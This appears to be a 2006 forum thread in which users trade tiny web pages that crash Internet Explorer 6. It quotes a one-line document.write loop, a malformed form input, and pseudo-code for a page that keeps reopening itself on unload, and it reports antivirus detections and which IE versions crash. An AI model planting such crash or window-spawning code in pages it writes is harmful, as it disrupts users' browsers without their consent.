New Crash IE with a 61 byte web page
[link|http://www.modernlifeisrubbish.co.uk/how-to-crash-internet-explorer.asp|How to Crash Internet Explorer]
<script>for (x in document.write) { document.write(x);}</script>
Darrell Spice, Jr.            Trendy yet complex
People seek me out - though they're not sure why
[link|http://spiceware.org/gallery/ArtisticOverpass|Artistic Overpass]                      [link|http://www.spiceware.org/|SpiceWare]
New I have 2 webpages now...
That do this to IE.

[link|http://www.gregfolkert.net/derail.html|Derail] and [link|http://www.gregfolkert.net/default.html|Default]

It is just amazing.
--
[link|mailto:greg@gregfolkert.net|greg],
[link|http://www.iwethey.org/ed_curry|REMEMBER ED CURRY!] @ iwethey
Freedom is not FREE.
Yeah, but 10s of Trillions of US Dollars?
SELECT * FROM scog WHERE ethics > 0;

0 rows returned.
New The FORM one's caught by Symantec AntiVirus
Scan type: Auto-Protect Scan
Event: Threat Found!
Threat: Crash.Trojan
File: C:\Documents and Settings\sfddspic\Local Settings\Temporary Internet Files\Content.IE5\C9CEGKFW\default[1].htm
Location: Quarantine
Computer: SFDW2411
User: sfddspic
Action taken: Quarantine succeeded : Access denied
Date found: Thursday, August 31, 2006 2:21:38 PM
Darrell Spice, Jr.            Trendy yet complex
People seek me out - though they're not sure why
[link|http://spiceware.org/gallery/ArtisticOverpass|Artistic Overpass]                      [link|http://www.spiceware.org/|SpiceWare]
New Crash Trojan? WTF?
Funny.

So a single line webpage is now a TROJAN.

Wahahaha.
--
[link|mailto:greg@gregfolkert.net|greg],
[link|http://www.iwethey.org/ed_curry|REMEMBER ED CURRY!] @ iwethey
Freedom is not FREE.
Yeah, but 10s of Trillions of US Dollars?
SELECT * FROM scog WHERE ethics > 0;

0 rows returned.
New dupe - ignore
Darrell Spice, Jr.            Trendy yet complex
People seek me out - though they're not sure why
[link|http://spiceware.org/gallery/ArtisticOverpass|Artistic Overpass]                      [link|http://www.spiceware.org/|SpiceWare]
Edited by SpiceWare Aug. 31, 2006, 03:46:52 PM EDT
New Neither page crashes IE7.
IE7 RC1 on the CS:S box here. (Version 7.0.5700.6)


Peter
[link|http://www.no2id.net/|Don't Let The Terrorists Win]
[link|http://www.kuro5hin.org|There is no K5 Cabal]
[link|http://guildenstern.dyndns.org|Home]
Use P2P for legitimate purposes!
[link|http://kevan.org/brain.cgi?pwhysall|A better terminal emulator]
Edited by pwhysall Sept. 2, 2006, 04:26:22 AM EDT
New Wow, dirt-simple concept
How about this (pseudo code, 'cause I'm not going to go look up the real DOM terms):

<script>
  var garbage = document.body.text; // throw the text from the body into a variable
  function addGarbage(){
    document.body.text.add('foo'); // write some additional text into the body
    garbage += document.body.text; // append the current body contents to your variable
    addGarbage();
  }
</script>
<body onLoad="addGarbage()" onUnload="document.new(garbage)">


Basically call a recursive function that keeps appending more and more crap to the body, and if you try to close the browser it opens a new window to keep writing crap. You probably wouldn't even need to add more to the body, just keep filling the variable with ever-increasing junk.

Seems pretty easy to do. I wonder how different browsers would deal with it, and if it would be more than an annoyance.




This is what happens when people who don't write childishly destructive code for a living see some childishly destructive code.
===

Purveyor of Doc Hope's [link|http://DocHope.com|fresh-baked dog biscuits and pet treats].
[link|http://DocHope.com|http://DocHope.com]
New Try my two pages.
--
[link|mailto:greg@gregfolkert.net|greg],
[link|http://www.iwethey.org/ed_curry|REMEMBER ED CURRY!] @ iwethey
Freedom is not FREE.
Yeah, but 10s of Trillions of US Dollars?
SELECT * FROM scog WHERE ethics > 0;

0 rows returned.
New At work? Are you serious?
===

Purveyor of Doc Hope's [link|http://DocHope.com|fresh-baked dog biscuits and pet treats].
[link|http://DocHope.com|http://DocHope.com]
New The onUnload is evil.
But the rest is basically an explicit - and browser neutral - version of what Spice posted. The flaw in the original is that IE dynamically changes the document object that the for loop sees whilst it is iterating over it. This violates how closures are supposed to work and is IMO the kind of thing that accounts for many of the JS/DOM bugs in IE.

Wade.
"Insert crowbar. Apply force."
New Porn site trick, had people freak at the law firm
When I was doing helpdesk, I got a call from the director of marketing. Told me to come up to her office, wouldn't say why. She opened an email, browser windows started popping up, the faster she closed them the faster they came up.

The contents were not work appropriate.

Not knowing the three-finger salute, she powered it down and called me. I calmly fixed her issue, and promised to explain to "anyone who might be looking at log files" that she wasn't really looking at that stuff.
===

Purveyor of Doc Hope's [link|http://DocHope.com|fresh-baked dog biscuits and pet treats].
[link|http://DocHope.com|http://DocHope.com]
New I have heard of that, now that you mention it.
Even though I will admit to browsing some salacious sites from time-to-time, I forget that people get hit with that nasty trick because I've been using Opera for years (and never used Outlook for internet mail) which has had popup blocking for some while.

Interesting term that: 'work appropriate'. Without giving too much away, I work for a company that needs to research that sort of thing. So we have a Malware network, where this sort of thing is provisionally allowed, and a Corporate network where it is not. I remember in my first few weeks seeing porn on some employee's PCs, plain as day. But, of course, it was connected with researching malware infection sites. So.

Wade.
"Insert crowbar. Apply force."
New Easier.
I don't know if it still works.

[link|http://z.iwethey.org/forums/render/content/show?contentid=100393|#100393].

Cheers,
Scott.
New Norton Antivirus catches it, but IE doesn't crash.
I made a simple web page as outlined at the [link|http://www.securityfocus.com/archive/1/319360/2003-04-20/2003-04-26/0|Security Focus] link. The page is:

<html>
<form>
<input type crash>
</form>
</html>


(Note that it gives a null-pointer exception in everything that uses SHLWAPI.DLL (IE, Frontpage, etc.).)

Opening the page with IE gives a Norton AntiVirus Notification popup:

Scan type: Realtime Protection Scan
Event: Virus Found!
Virus name: Trojan.CrashIE
[...]


Turning off NAV gives a blank page with no crash, so apparently that bug has been fixed in one of the post 2003 IE updates.

FWIW.

Cheers,
Scott.
New Didn't do anything to me
6.00.29 yadda yadda sp2 on XP
Too much of today's music is fashionable crap dressed as artistry.
Adrian Belew
New Certainly crashed my IE. XP Media Center w/IE 6.0.29
Of course, I had to actually use IE in the first place to check it.
New IE7 unaffected.


Peter
[link|http://www.no2id.net/|Don't Let The Terrorists Win]
[link|http://www.kuro5hin.org|There is no K5 Cabal]
[link|http://guildenstern.dyndns.org|Home]
Use P2P for legitimate purposes!
[link|http://kevan.org/brain.cgi?pwhysall|A better terminal emulator]
     Crash IE with a 61 byte web page - (SpiceWare) - (16)
         I have 2 webpages now... - (folkert) - (4)
             The FORM one's caught by Symantec AntiVirus - (SpiceWare) - (1)
                 Crash Trojan? WTF? - (folkert)
             dupe - ignore -NT - (SpiceWare)
             Neither page crashes IE7. - (pwhysall)
         Wow, dirt-simple concept - (drewk) - (5)
             Try my two pages. -NT - (folkert) - (1)
                 At work? Are you serious? -NT - (drewk)
             The onUnload is evil. - (static) - (2)
                 Porn site trick, had people freak at the law firm - (drewk) - (1)
                     I have heard of that, now that you mention it. - (static)
         Easier. - (Another Scott) - (1)
             Norton Antivirus catches it, but IE doesn't crash. - (Another Scott)
         Didn't do anything to me - (bepatient) - (1)
             Certainly crashed my IE. XP Media Center w/IE 6.0.29 - (n3jja)
         IE7 unaffected. -NT - (pwhysall)
